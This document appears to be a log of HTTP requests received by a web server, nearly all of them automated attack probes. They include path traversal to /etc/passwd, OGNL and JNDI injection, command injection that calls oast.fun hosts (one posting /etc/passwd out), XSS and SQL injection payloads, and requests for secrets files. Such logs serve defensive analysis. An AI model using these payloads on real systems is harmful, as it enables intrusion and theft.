1 | CONNECT | ifconfig[.]me:443 |
HTTP/1.1 |
1 | CONNECT | pro.ip-api[.]com:443 |
HTTP/1.1 |
1 | CONNECT | smtp[.]aol[.]com:25 |
HTTP/1.1 |
1 | DELETE | /actuator/gateway/routes/2Lw02doD4fJH2w5e63zdW0aGBx7 |
HTTP/1.1 |
1 | GET | /%250A/interact.sh/ |
HTTP/1.1 |
1 | GET | /%2520../web-inf/web.xml |
HTTP/1.1 |
1 | GET | /%2524%257B%2528%2523a%253D%2540org.apache.commons.io.IOUtils%2540toString%2528%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522whoami%2522%2529.getInputStream%2528%2529%252C%2522utf-8%2522%2529%2529.%2528%2540com.opensymphony.webwork.ServletActionContext%2540getResponse%2528%2529.setHeader%2528%2522X-Cmd-Response%2522%252C%2523a%2529%2529%257D/ |
HTTP/1.1 |
1 | GET | /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522nslookup%2520cfoshuv52mup8baf1ho0fknghinhhyqtr.oast.fun%2522%2529%257D/ |
HTTP/1.1 |
1 | GET | /%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd |
HTTP/1.1 |
1 | GET | /%252f.. |
HTTP/1.1 |
1 | GET | /%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini |
HTTP/1.1 |
1 | GET | /-/snippets |
HTTP/1.1 |
1 | GET | /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini |
HTTP/1.1 |
1 | GET | /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini |
HTTP/1.1 |
1 | GET | /..../..../..../..../..../..../..../..../..../windows/win.ini |
HTTP/1.1 |
1 | GET | /....4.2.1....json |
HTTP/1.1 |
1 | GET | /.../.../.../.../.../.../.../.../.../etc/passwd |
HTTP/1.1 |
2 | GET | /.../.../.../.../.../.../.../.../.../windows/win.ini |
HTTP/1.1 |
1 | GET | /../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /../../../../../../../../../../../../windows/win.ini |
HTTP/1.1 |
1 | GET | /../../etc/passwd |
HTTP/1.1 |
1 | GET | /..;/..;/host-manager/html;/ |
HTTP/1.1 |
1 | GET | /..;/..;/manager/html;/ |
HTTP/1.1 |
1 | GET | /..;/host-manager/html |
HTTP/1.1 |
1 | GET | /..;/manager/html |
HTTP/1.1 |
1 | GET | /.1.json |
HTTP/1.1 |
1 | GET | /.DS_Store |
HTTP/1.1 |
1 | GET | /.bash_history |
HTTP/1.1 |
1 | GET | /.children....4.2.1....json |
HTTP/1.1 |
1 | GET | /.children.1.json |
HTTP/1.1 |
1 | GET | /.children.json/FNZ.css |
HTTP/1.1 |
1 | GET | /.children.json/FNZ.html |
HTTP/1.1 |
1 | GET | /.children.json/FNZ.ico |
HTTP/1.1 |
1 | GET | /.children.json/FNZ.png |
HTTP/1.1 |
1 | GET | /.children.json?FNZ.css |
HTTP/1.1 |
1 | GET | /.children.json?FNZ.html |
HTTP/1.1 |
1 | GET | /.children.json?FNZ.ico |
HTTP/1.1 |
1 | GET | /.circleci/config.yml |
HTTP/1.1 |
1 | GET | /.composer/composer.json |
HTTP/1.1 |
1 | GET | /.config/karma.conf.js |
HTTP/1.1 |
1 | GET | /.dbeaver/data-sources.json |
HTTP/1.1 |
30 | GET | /.env |
HTTP/1.1 |
1 | GET | /.idea/WebServers.xml |
HTTP/1.1 |
1 | GET | /.idea/webServers.xml |
HTTP/1.1 |
1 | GET | /.idea/webservers.xml |
HTTP/1.1 |
1 | GET | /.json/FNZ.css |
HTTP/1.1 |
1 | GET | /.json/FNZ.html |
HTTP/1.1 |
1 | GET | /.json/FNZ.ico |
HTTP/1.1 |
1 | GET | /.json/FNZ.png |
HTTP/1.1 |
1 | GET | /.json?FNZ.css |
HTTP/1.1 |
1 | GET | /.json?FNZ.html |
HTTP/1.1 |
1 | GET | /.json?FNZ.ico |
HTTP/1.1 |
1 | GET | /.json |
HTTP/1.1 |
1 | GET | /.ksh_history |
HTTP/1.1 |
1 | GET | /.licenserc.yaml |
HTTP/1.1 |
1 | GET | /.msmtprc |
HTTP/1.1 |
1 | GET | /.phpspec.yml |
HTTP/1.1 |
1 | GET | /.phpunit.result.cache |
HTTP/1.1 |
1 | GET | /.pre-commit-config.yaml |
HTTP/1.1 |
1 | GET | /.remote-sync.json |
HTTP/1.1 |
1 | GET | /.sass-lint.yml |
HTTP/1.1 |
1 | GET | /.sh_history |
HTTP/1.1 |
1 | GET | /.zsh_history |
HTTP/1.1 |
1 | GET | ///apps |
HTTP/1.1 |
1 | GET | ///etc....4.2.1....json |
HTTP/1.1 |
1 | GET | ///etc[.]1[.]json |
HTTP/1.1 |
1 | GET | ///etc[.]children....4.2.1....json |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]1[.]json |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.css |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.html |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.ico |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.png |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json?FNZ.css |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json?FNZ.html |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json?FNZ.ico |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json |
HTTP/1.1 |
1 | GET | ///etc[.]json/FNZ.html |
HTTP/1.1 |
1 | GET | ///etc[.]json/FNZ.ico |
HTTP/1.1 |
1 | GET | ///etc[.]json/FNZ.png |
HTTP/1.1 |
1 | GET | ///etc[.]json?FNZ.css |
HTTP/1.1 |
1 | GET | ///etc[.]json?FNZ.ico |
HTTP/1.1 |
1 | GET | ///etc[.]json |
HTTP/1.1 |
1 | GET | ///etc |
HTTP/1.1 |
1 | GET | ///home |
HTTP/1.1 |
1 | GET | ///var |
HTTP/1.1 |
1 | GET | //WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | //WEB-INF/weblogic.xml |
HTTP/1.1 |
1 | GET | /2Lw00PSmAE0c3wRgIZqSFYSy14J/..;/host-manager/html |
HTTP/1.1 |
1 | GET | /2Lw00PSmAE0c3wRgIZqSFYSy14J/..;/manager/html |
HTTP/1.1 |
1 | GET | /2Lw00PSvlB2B9ljRqdldrTIUQDP.txt |
HTTP/1.1 |
1 | GET | /2Lw02pospG9iHc91ivzcIdTiaXi.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http[:]//cfoshuv52mup8baf1ho0a5byt9qke6tye[.]oast[.]fun%22)%7D' |
HTTP/1.1 |
1 | GET | /404 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?action=command&command=set_city_timezone&value=$(wget%20http[:]//cfoshuv52mup8baf1ho01dxk87wrj9gef[.]oast[.]fun)) |
HTTP/1.1 |
1 | GET | /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= |
HTTP/1.1 |
2 | GET | /?author=1 |
HTTP/1.1 |
1 | GET | /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug |
HTTP/1.1 |
1 | GET | /?lang=../../thinkphp/base |
HTTP/1.1 |
1 | GET | /?mdocs-img-preview=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /?patreon_action=serve_patron_only_image&patron_only_image=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /?paytm_action=curltest&url=cfoshuv52mup8baf1ho0qhoz7nh8k3rf3.oast.fun |
HTTP/1.1 |
1 | GET | /?post_type=post&s=%22%3E%3Cscript%3Ealert(/2Lw00LYXzNmcesRfoebYZNHqEPQ/)%3C/script%3E+ |
HTTP/1.1 |
1 | GET | /?pp=env |
HTTP/1.1 |
1 | GET | /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 |
HTTP/1.1 |
1 | GET | /?redirect=https[:]//interact[.]sh/&wptouch_switch=desktop |
HTTP/1.1 |
1 | GET | /?{alert(document.domain)} |
HTTP/1.1 |
1 | GET | /Account/login |
HTTP/1.1 |
1 | GET | /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminemail=test@test.com&adminname=test&adminpassword=h3cAPs&adminusername=HW2Reu |
HTTP/1.1 |
1 | GET | /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /Admin |
HTTP/1.1 |
1 | GET | /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /Audio/1/hls/..%255C..%255C..%255C..%255C..%255C..%255CWindows%255Cwin.ini/stream.mp3/ |
HTTP/1.1 |
1 | GET | /AvalancheWeb/image?imageFilePath=C:/windows/win.ini |
HTTP/1.1 |
1 | GET | /CACHE/sdesktop/install/start.htm |
HTTP/1.1 |
1 | GET | /CFIDE/componentutils/login.cfm |
HTTP/1.1 |
1 | GET | /CFIDE/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /CF_SFSD/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /CMSInstall/install.aspx |
HTTP/1.1 |
1 | GET | /CMSPages/GetDocLink.ashx?link=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /CMSPages/logon.aspx |
HTTP/1.1 |
1 | GET | /Cargo.lock |
HTTP/1.1 |
1 | GET | /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /EMSWebClient/Login.aspx |
HTTP/1.1 |
1 | GET | /Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form> |
HTTP/1.1 |
1 | GET | /Gruntfile.coffee |
HTTP/1.1 |
1 | GET | /Gruntfile.js |
HTTP/1.1 |
1 | GET | /Guardfile |
HTTP/1.1 |
1 | GET | /IND780/excalweb.dll?webpage=../../AutoCE.ini |
HTTP/1.1 |
1 | GET | /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion[.]Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS |
HTTP/1.1 |
1 | GET | /JavaScriptServlet |
HTTP/1.1 |
1 | GET | /Login.aspx |
HTTP/1.1 |
1 | GET | /Login.jsp |
HTTP/1.1 |
1 | GET | /Login?!'><sVg/OnLoAD=alert 1337// |
HTTP/1.1 |
1 | GET | /Main_Login.asp |
HTTP/1.1 |
1 | GET | /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) |
HTTP/1.1 |
1 | GET | /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh |
HTTP/1.1 |
1 | GET | /PMA/server_import.php |
HTTP/1.1 |
1 | GET | /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /QH.aspx?action=download&fileName=.%2fQH.aspx&responderId=ResourceNewResponder |
HTTP/1.1 |
1 | GET | /SAAS/t/_/;/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /SOGo |
HTTP/1.1 |
1 | GET | /SecurityGateway.dll?9OW4L7RSDY=1&redirect=true&view=login |
HTTP/1.1 |
1 | GET | /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion[.]Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS |
HTTP/1.1 |
1 | GET | /Solar_SlideSub.php?bgcolor=green&id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22 |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.DialogHandler.axd?dp=1 |
HTTP/1.1 |
1 | GET | /Videos/1/hls/m/..%255C..%255C..%255C..%255C..%255C..%255CWindows%255Cwin.ini/stream.mp3/ |
HTTP/1.1 |
1 | GET | /\\u001B]8;;https[:]//interact[.]sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 |
HTTP/1.1 |
1 | GET | /__r2/query-printRows.view?query.containerFilterName=CurrentAndSubfolders&query.queryName=ListManager&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&schemaName=ListManager |
HTTP/1.1 |
1 | GET | /_debugbar/open?max=20&offset=0 |
HTTP/1.1 |
1 | GET | /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /_vti_bin/Authentication.asmx?op=Mode |
HTTP/1.1 |
1 | GET | /aa404bb?a</script><script>alert(/XSS/)</script> |
HTTP/1.1 |
1 | GET | /account/signin?ReturnUrl=%2f |
HTTP/1.1 |
1 | GET | /acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e |
HTTP/1.1 |
1 | GET | /actuator/autoconfig |
HTTP/1.1 |
1 | GET | /actuator/heapdump |
HTTP/1.1 |
1 | GET | /actuator/jolokia/exec/ch[.]qos[.]logback[.]classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion |
HTTP/1.1 |
1 | GET | /actuator/jolokia/read/java[.]lang:type=Memory |
HTTP/1.1 |
1 | GET | /actuator/loggers |
HTTP/1.1 |
1 | GET | /actuator/mappings |
HTTP/1.1 |
1 | GET | /actuator/metrics |
HTTP/1.1 |
1 | GET | /actuator/status |
HTTP/1.1 |
1 | GET | /addons/phpmailer/phpmailer.php |
HTTP/1.1 |
1 | GET | /adm/file.cgi?next_file=%2fetc%2fpasswd |
HTTP/1.1 |
1 | GET | /admin.php |
HTTP/1.1 |
4 | GET | /admin/ |
HTTP/1.1 |
1 | GET | /admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> |
HTTP/1.1 |
1 | GET | /admin/histograms?fmt=plot_cdf&h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&log_scale=true |
HTTP/1.1 |
1 | GET | /admin/index.html |
HTTP/1.1 |
2 | GET | /admin/index.php?page=home |
HTTP/1.1 |
1 | GET | /admin/login |
HTTP/1.1 |
1 | GET | /admin/phpMyAdmin/server_import.php |
HTTP/1.1 |
1 | GET | /admin/pma/server_import.php |
HTTP/1.1 |
1 | GET | /admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e |
HTTP/1.1 |
1 | GET | /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 |
HTTP/1.1 |
1 | GET | /admin/server_import.php |
HTTP/1.1 |
1 | GET | /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 |
HTTP/1.1 |
1 | GET | /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 |
HTTP/1.1 |
1 | GET | /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /agc/vicidial_mysqli_errors.txt |
HTTP/1.1 |
1 | GET | /android/app/google-services.json |
HTTP/1.1 |
1 | GET | /api/ |
HTTP/1.1 |
1 | GET | /api/geojson?url=${jndi:ldap://${sys:os.name}.cfoshuv52mup8baf1ho09wqom587fr7nc.oast.fun} |
HTTP/1.1 |
1 | GET | /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20cfoshuv52mup8baf1ho0troi5wturbxtd.oast.fun) |
HTTP/1.1 |
1 | GET | /api/graphql?query={__typename} |
HTTP/1.1 |
1 | GET | /api/proxy/tcp |
HTTP/1.1 |
1 | GET | /api/scrape/kube-system |
HTTP/1.1 |
1 | GET | /api/status |
HTTP/1.1 |
1 | GET | /api/tenants |
HTTP/1.1 |
1 | GET | /api/userrolelist/systemRoles?require-cfg.js |
HTTP/1.1 |
1 | GET | /api/v1/GetDevice |
HTTP/1.1 |
1 | GET | /api/v1/GetSrc |
HTTP/1.1 |
1 | GET | /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs |
HTTP/1.1 |
1 | GET | /api/v1/targets |
HTTP/1.1 |
1 | GET | /api/whoami |
HTTP/1.1 |
1 | GET | /api/xml |
HTTP/1.1 |
1 | GET | /apimanui/api-manager |
HTTP/1.1 |
1 | GET | /app/google-services.json |
HTTP/1.1 |
1 | GET | /app/kibana |
HTTP/1.1 |
1 | GET | /app/welcome/default/ |
HTTP/1.1 |
1 | GET | /appGet.cgi?hook=get_cfg_clientlist() |
HTTP/1.1 |
1 | GET | /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Bsubmit%5D=Change%20Password&login%5Buse_curr%5D=1 |
HTTP/1.1 |
1 | GET | /applications.pinpoint |
HTTP/1.1 |
1 | GET | /apps.tidy.infinity.json |
HTTP/1.1 |
1 | GET | /apps |
HTTP/1.1 |
1 | GET | /appsettings.Production.json |
HTTP/1.1 |
1 | GET | /appsettings.json |
HTTP/1.1 |
1 | GET | /asd/../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /assets/file:%252f%252f/etc/passwd |
HTTP/1.1 |
1 | GET | /assets/npm-debug.log |
HTTP/1.1 |
1 | GET | /assets/php/filebrowser/filebrowser.main.php?do=download&file=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /assets/pubspec.yaml |
HTTP/1.1 |
1 | GET | /auth/login/page |
HTTP/1.1 |
2 | GET | /auth/login |
HTTP/1.1 |
1 | GET | /auth/logout?continue=//interact[.]sh |
HTTP/1.1 |
1 | GET | /authorization.do |
HTTP/1.1 |
1 | GET | /autoconfig |
HTTP/1.1 |
1 | GET | /axis2-admin/ |
HTTP/1.1 |
1 | GET | /axis2/ |
HTTP/1.1 |
1 | GET | /axis2/axis2-admin/ |
HTTP/1.1 |
1 | GET | /backend/admin/users?username=anonymous |
HTTP/1.1 |
1 | GET | /backend/backend/auth/signin |
HTTP/1.1 |
1 | GET | /badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/> |
HTTP/1.1 |
1 | GET | /behat.yml.dist |
HTTP/1.1 |
1 | GET | /behat.yml |
HTTP/1.1 |
1 | GET | /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event1&event2&event3&goto=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event1&event2&event3=download&goto=https[:]//interact[.]sh |
HTTP/1.1 |
2 | GET | /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https[:]//interact[.]sh&site_id=s1 |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event3=352513&goto=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https[:]//interact[.]sh&id=691&site_id=s3 |
HTTP/1.1 |
1 | GET | /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https[:]//interact[.]sh&id=84&site_id=n1 |
HTTP/1.1 |
1 | GET | /bitrix/rk.php?event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https[:]//interact[.]sh&id=28&site_id=s2 |
HTTP/1.1 |
1 | GET | /bitrix/rk.php?event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https[:]//interact[.]sh&id=129 |
HTTP/1.1 |
1 | GET | /bitrix/rk.php?goto=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /boafrm/formWlanRedirect?redirect-url=http[:]//interact[.]sh&wlan_id=1 |
HTTP/1.1 |
1 | GET | /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ |
HTTP/1.1 |
1 | GET | /bower.json |
HTTP/1.1 |
1 | GET | /browser/ |
HTTP/1.1 |
1 | GET | /bugs/verify.php?confirm_hash&id=1 |
HTTP/1.1 |
1 | GET | /cacti/ |
HTTP/1.1 |
1 | GET | /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E |
HTTP/1.1 |
1 | GET | /camunda/app/welcome/default/ |
HTTP/1.1 |
1 | GET | /car1/estimateresult/result?s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /carbon/admin/login.jsp |
HTTP/1.1 |
1 | GET | /ccm-web/ |
HTTP/1.1 |
1 | GET | /ccmadmin/bulkvivewfilecontents.do?fileName=../../../../../../../../../../../../../../../../etc/passwd&filetype=samplefile |
HTTP/1.1 |
1 | GET | /cf-scripts/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cf_scripts/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cfcache.map |
HTTP/1.1 |
1 | GET | /cfide-scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cfide/componentutils/login.cfm |
HTTP/1.1 |
1 | GET | /cfide/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cfmx/CFIDE/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cgi-bin/GetSrvInfo.exe |
HTTP/1.1 |
1 | GET | /cgi-bin/admin.cgi?Cmd=ping${IFS}-c${IFS}1${IFS}cfoshuv52mup8baf1ho0wczc9nnjw653z.oast.fun&Command=sysCommand |
HTTP/1.1 |
1 | GET | /cgi-bin/apcupsd/multimon.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/broker?BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&_DEBUG=131&_DEBUG=131&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&_PROGRAM=sample.webcsf1.sas&_SERVICE=targetservice&_WEBOUT=test&bgtype=COLOR&csftyp=classic,+ssfile1%3d/etc/passwd&style=a+tcolor%3dblue&sysparm=test |
HTTP/1.1 |
1 | GET | /cgi-bin/common/login/webLogin |
HTTP/1.1 |
1 | GET | /cgi-bin/cosmobdf.cgi?function=0 |
HTTP/1.1 |
1 | GET | /cgi-bin/cosmobdf.cgi?function=1 |
HTTP/1.1 |
2 | GET | /cgi-bin/downloadFlile.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/guestimage.html |
HTTP/1.1 |
1 | GET | /cgi-bin/jarrewrite.sh |
HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Action=StartSessionSubmit&PW&User='%0acat%20/etc/passwd%0a' |
HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Action=x509List&Section=NoAuthREQ&type=*%22/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd%22 |
HTTP/1.1 |
1 | GET | /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd |
HTTP/1.1 |
1 | GET | /cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd |
HTTP/1.1 |
1 | GET | /cgi-bin/luci |
HTTP/1.1 |
1 | GET | /cgi-bin/multimon.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/qmailadmin/qmailadmin |
HTTP/1.1 |
1 | GET | /cgi-bin/qmailadmin |
HTTP/1.1 |
1 | GET | /cgi-bin/upload/web-ftp.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/xweb500.cgi |
HTTP/1.1 |
1 | GET | /cgi-ssl/qmailadmin/qmailadmin |
HTTP/1.1 |
1 | GET | /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272Lw01ISgStrn59TB2Oq9pPi0u36%27)%3C/script%3E |
HTTP/1.1 |
1 | GET | /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /chpstrt.php?chppath=Home |
HTTP/1.1 |
1 | GET | /client_secrets.json |
HTTP/1.1 |
1 | GET | /cloud/ |
HTTP/1.1 |
1 | GET | /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /common_page/login.html |
HTTP/1.1 |
1 | GET | /components/com_ionfiles/download.php?download=1&file=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /composer.json |
HTTP/1.1 |
1 | GET | /composer.lock |
HTTP/1.1 |
1 | GET | /composer/send_email?to=LjWF@Tokp&url=http[:]//cfoshuv52mup8baf1ho0ud1atksrefph3[.]oast[.]fun |
HTTP/1.1 |
1 | GET | /config/secrets.yml |
HTTP/1.1 |
1 | GET | /config/user.xml |
HTTP/1.1 |
1 | GET | /connections |
HTTP/1.1 |
1 | GET | /cors_proxy/https[:]//www[.]interact[.]sh |
HTTP/1.1 |
1 | GET | /cp/Shares?protocol=webaccess&user&v=2.3 |
HTTP/1.1 |
1 | GET | /cpqlogin.htm |
HTTP/1.1 |
1 | GET | /crossdomain.xml |
HTTP/1.1 |
1 | GET | /crx/de/index.jsp |
HTTP/1.1 |
1 | GET | /crx/explorer/browser/index.jsp |
HTTP/1.1 |
1 | GET | /cs/Satellite?WemUI=qqq%27}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor |
HTTP/1.1 |
1 | GET | /cs/Satellite?WemUI=qqq%27}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest |
HTTP/1.1 |
1 | GET | /cs/Satellite?cs_imagedir=qqq\"><script>alert(document.domain)</script>&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker |
HTTP/1.1 |
1 | GET | /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots |
HTTP/1.1 |
